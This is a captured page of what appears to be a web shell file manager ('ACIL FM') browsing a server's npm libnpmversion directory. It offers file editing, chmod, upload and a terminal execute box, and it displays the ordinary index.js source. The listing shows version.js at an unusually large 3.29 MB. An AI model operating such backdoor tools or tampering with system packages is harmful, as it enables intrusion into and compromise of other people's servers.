ACIL FM
Dark
Refresh
Current DIR:
/lib/node_modules/npm/node_modules/libnpmversion/lib
/
lib
node_modules
npm
node_modules
libnpmversion
lib
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
commit.js
425 B
chmod
View
DL
Edit
Rename
Delete
enforce-clean.js
837 B
chmod
View
DL
Edit
Rename
Delete
index.js
805 B
chmod
View
DL
Edit
Rename
Delete
read-json.js
335 B
chmod
View
DL
Edit
Rename
Delete
retrieve-tag.js
384 B
chmod
View
DL
Edit
Rename
Delete
tag.js
470 B
chmod
View
DL
Edit
Rename
Delete
version.js
3.29 MB
chmod
View
DL
Edit
Rename
Delete
write-json.js
524 B
chmod
View
DL
Edit
Rename
Delete
Edit file: /lib/node_modules/npm/node_modules/libnpmversion/lib/index.js
const readJson = require('./read-json.js') const version = require('./version.js') module.exports = async (newversion, opts = {}) => { const { path = process.cwd(), allowSameVersion = false, tagVersionPrefix = 'v', commitHooks = true, gitTagVersion = true, signGitCommit = false, signGitTag = false, force = false, ignoreScripts = false, scriptShell = undefined, preid = null, message = 'v%s', silent, } = opts const pkg = opts.pkg || await readJson(path + '/package.json') return version(newversion, { path, cwd: path, allowSameVersion, tagVersionPrefix, commitHooks, gitTagVersion, signGitCommit, signGitTag, force, ignoreScripts, scriptShell, preid, pkg, message, silent, }) }
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply